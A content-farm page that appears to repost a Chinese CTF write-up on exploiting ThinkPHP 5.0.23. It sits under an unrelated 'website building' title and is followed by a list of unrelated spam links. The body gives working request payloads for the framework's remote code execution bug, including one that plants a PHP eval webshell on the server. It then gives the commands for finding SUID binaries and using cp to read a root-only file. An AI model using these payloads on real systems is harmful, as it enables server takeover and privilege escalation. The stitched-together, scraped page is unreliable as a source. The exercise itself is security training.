当前位置: 首页 > news >正文

福州自助建设网站网站渗透案例

福州自助建设网站,网站渗透案例,超级外链吧,wordpress免费模版前言:比赛是结束了#xff0c;但我的学习还未结束#xff0c;看看自己能复习几道题吧#xff0c;第四周实在太难 Final 考点#xff1a; ThinkPHP 5.0.23 RCE一句话木马上传SUID提权#xff08;find#xff09; 解题: 首先页面就给了ThinkPHP V5#xff0c; 那无非考… 前言:比赛是结束了但我的学习还未结束看看自己能复习几道题吧第四周实在太难 Final 考点 ThinkPHP 5.0.23 RCE一句话木马上传SUID提权find 解题: 首先页面就给了ThinkPHP V5 那无非考的就是ThinkPHP版本的漏洞 经过信息收集发现确实是ThinkPHP 5.0.23漏洞 下篇文章即有现成的讲解 https://blog.csdn.net/Lucky1youzi/article/details/128740552 我们按照他说的做首先抓包进行传参 GET:index.php?scaptcha POST:_method__constructfilter[]phpinfomethodgetserver[REQUEST_METHOD]1 这个参数1 是可以进行修改的竟然能出现phpinfo页面 那我们就可以进行RCE但是我们发现命令执行参数全被ban了可能是权限的问题 我们上传一句话木马 _method__constructfilter[]execmethodgetserver[REQUEST_METHOD]echo%20?php%20eval($_POST[cmd]);?%20%20/var/www/public/1.php 然后蚁剑连接后发现根目录下存在flag文件 但是里面内容没有 一眼没权限我们去终端看看 我们发现 -rwx-----意思就是只能文件主的权限使用 意思就是最高权限才能读 尝试chmod无果 然后我们这里就查看具有SUID权限的命令 find / -user root -perm -4000 -print 2/dev/null 这个利用find进行提权可以访问 https://blog.csdn.net/rlenew/article/details/111873682 我们使用cp命令SUID提权读取Flag cp /flag_dd3f6380aa0d /dev/stdout / dev / stdout是—个特殊的文件代表标准输出。
http://www.dnsts.com.cn/news/80271.html

相关文章:

  • 郴州微网站建设wordpress用户权限在哪改
  • 怎样换网站logo个人品牌营销策划方案
  • 大气的企业网站源码河南安阳市地图
  • 电子商务网站安全措施专业seo服务
  • 商务网站建设方案ppt网络推广运营是做什么
  • 重庆网站建设公司沈阳网站建设优秀公司
  • 网站建设百度首页东莞阳光网站投诉平台
  • 中国十大网站有哪些广州营销型网站优化
  • 有什么网站可以做平面兼职网站的建站方案
  • 网站建设需要注意哪些关键细节网站建设人员工作计划
  • 网站的中文域名是什么网站开发无使用期限怎么摊销
  • 姜堰网站建设在线免费高清logo
  • 在线视频播放网站开发thinkphp制作网站开发
  • 做的最好的相亲网站有哪些可口可乐搜索引擎营销案例
  • 拓展公司网站建设网页版qq登录入口手机版
  • 确定网站主题微信公众 wordpress
  • 彩票网站开发定制如何做好网站关键词布局
  • 百度索引量和网站排名山东助企网站建设
  • 安贞网站建设公司90设计网好吗
  • 山西住房与建设部网站吉安建站公司
  • 贵阳两学一做网站网站目录字典
  • 巨鹿做网站哪家好网站制作百度资源
  • 手机网站开发应注意网站建设亿金手指科杰
  • 订单网站模块岳阳网站开发
  • 网站首页的图片怎样做缓存wordpress小工具开发教程
  • 站长seo查询深圳哪家网站建设公司好
  • 实验中心网站建设dw网页制作教程简单
  • 苏州市住房城乡建设局网站django mysql网站开发
  • 网站被电脑管家拦截做301跳转平台设计方案
  • python做网站用插件做网站